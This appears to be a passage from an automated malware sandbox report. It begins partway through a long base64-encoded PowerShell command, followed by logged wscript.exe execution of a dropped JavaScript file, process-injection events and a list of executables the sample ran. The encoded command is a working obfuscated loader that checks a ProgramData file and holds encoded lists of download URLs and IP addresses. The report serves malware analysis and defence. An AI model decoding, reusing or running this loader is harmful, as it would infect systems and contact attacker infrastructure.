TwBRAEEAeABBAEMANABBAE0AZwBBADAAQQBEAEUAQQBMAGcAQQA1AEEARABjAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAxADcAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARQBrAEEAWgBBAEIAbABBAEcAOABBAGMAQQBCAHkAQQBHAEUAQQBlAEEAQgBwAEEASABNAEEAZABBAEEAdQBBAEYASQBBAGQAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEASABRAEEAYQBRAEIAMgBBAEcAVQBBAEwAQQBCADIAQQBHAGsAQQBjAEEAQgB6AEEARABzAEEAYwB3AEIAcwBBAEcARQBBAFkAdwBCAHIAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEAIgA7ACQAcwB1AG0AbQBpAG4AZwBzAFAAbwBsAGwAZQByAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEgAUQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBFAEEAUQB3AEIAaABBAEgASQBBAFoAQQBCADEAQQBHAFUAQQBiAEEAQgBwAEEASABNAEEATABnAEIAMwBBAEcAOABBAGMAZwBCAHIAQQBBAD0APQBKAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYQBRAEIAcgBBAEcAawBBAGIAQQBCAHYAQQBHAEkAQQBiAEEAQgBoAEEASABNAEEAZABBAEEAdQBBAEcATQBBAGIAdwBCADEAQQBIAEkAQQBjAHcAQgBsAEEASABNAEEAIgA7ACQAdABvAGcAbABlAHMAcwBDAG8AcgBuAGMAcgBhAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAGgAQQBIAEEAQQBhAEEAQgA1AEEARwB3AEEAYQBRAEIAdQBBAEcAVQBBAFYAQQBCAG8AQQBHAGsAQQBiAFEAQgBpAEEARwB3AEEAWgBRAEIAdABBAEcARQBBAGIAZwBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7ACQAZwBsAHUAZQBtAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADAAQQBIAEkAQQBZAFEAQgB1AEEASABNAEEAWQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBTAGcAQgBoAEEASABJAEEAWgB3AEIAdgBBAEcAOABBAGIAZwBCAHoAQQBDADQAQQBZAHcAQgB2AEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHADgAQQBjAGcAQgB6AEEAQQA9AD0AZAB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AdwBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAHUAcgBhAGQAZABpAHQAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBHAGcAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAcABBAEgATQBBAGQAQQBCAEoAQQBIAE0AQQBiAHcAQgB0AEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCAHkAQQBIAEEAQQBhAEEAQgBwAEEASABNAEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBkAFEAQgB1AEEARwBrAEEAZABBAEIANQBBAEEAPQA9AFcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAdwBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB4AEEARABRAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADIAQQBBAD0APQBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABZAEEATgBnAEEAdQBBAEQAZwBBAE8AUQBBAD0AVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAYwB3AEIAcABBAEcARQBBAEwAZwBCADEAQQBIAE0AQQAiADsAJABpAGIAdQBwAHIAbwBmAGUAbgBEAGUAcgBlAGcAdQBsAGEAdABpAG8AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAZABRAEIAaQBBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAagBBAEcARQBBAFoAZwBCAGwAQQBBAD0APQBGAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAdwBCAHMAQQBIAGsAQQBjAEEAQgBvAEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGIAUQBCAEMAQQBHAHcAQQBaAFEAQgB3AEEARwBnAEEAWQBRAEIAeQBBAEcAOABBAGMAQQBCAG8AQQBIAFEAQQBhAEEAQgBoAEEARwB3AEEAYgBRAEIAcABBAEcARQBBAEwAZwBCAG8AQQBHADgAQQBjAGcAQgB6AEEARwBVAEEARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBrAEEAZABBAEIAMQBBAEgAUQBBAFoAUQBCAHkAQQBIAE0AQQBVAHcAQgB0AEEARwA4AEEAYQB3AEIAbABBAEgATQBBAEwAZwBCAGkAQQBHAEUAQQBiAGcAQgBrAEEAQQA9AD0AIgA7AH0AfQAkAFYAaQB0AHQAbABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEUAQQBOAHcAQQB1AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AdwBBAHgAQQBBAD0APQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEcAMABBAFoAUQBCAHkAQQBHAGsAQQBjAHcAQgBsAEEAQwA0AEEAWgBnAEIAaABBAEcAawBBAGIAQQBBAD0AbwBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEUAQQBOAGcAQQA1AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AZwBBAHoAQQBEAEkAQQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATQBnAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB4AEEARABZAEEATABnAEEAeABBAEQAYwBBAE8AQQBBAD0AIgA7ACQAbQBpAGMAcgBvAHAAaABhAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AZwBBAHcAQQBDADQAQQBOAGcAQQB5AEEAQwA0AEEATQBRAEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQA9AHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAdABBAEcAawBBAGIAQQBCAHAAQQBHAEUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAdQBBAEcAUQBBAGIAdwBCADMAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAPQAiADsA"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\ProgramData\aeolus.js" OxeyesSpondaic quadragesima feculence TouristshipFeldspathization
parent_process	wscript.exe	martian_process	wscript "C:\ProgramData\aeolus.js" OxeyesSpondaic quadragesima feculence TouristshipFeldspathization

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2552 resumed a thread in remote process 2752
Process injection	Process 2752 resumed a thread in remote process 2872
NtResumeThread May 23, 2023, 9:37 a.m.	thread_handle: 0x000002f4 suspend_count: 1 process_identifier: 2752	1	0	0
NtResumeThread May 23, 2023, 9:37 a.m.	thread_handle: 0x00000304 suspend_count: 1 process_identifier: 2872	1	0	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Bkeeki.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All